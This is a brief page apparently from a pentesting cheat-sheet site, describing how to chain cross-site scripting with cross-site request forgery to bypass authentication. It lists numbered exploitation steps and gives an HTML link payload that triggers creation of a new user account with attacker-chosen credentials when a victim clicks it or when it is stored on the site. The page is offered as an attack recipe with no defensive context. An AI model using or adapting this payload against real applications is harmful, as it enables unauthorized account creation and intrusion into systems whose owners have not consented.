search

CSRF + XSS (auth bypass)

hashtag
prerequisites

  1. Login page

  2. Message us/ contact page

hashtag
Exploitation

  1. try xss on submit page

  2. if it works try insert this csrf xss exploit

  3. sometimes maybe xss is stored, then try directly

<a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>

PreviousXSSNextsql injection

Last updated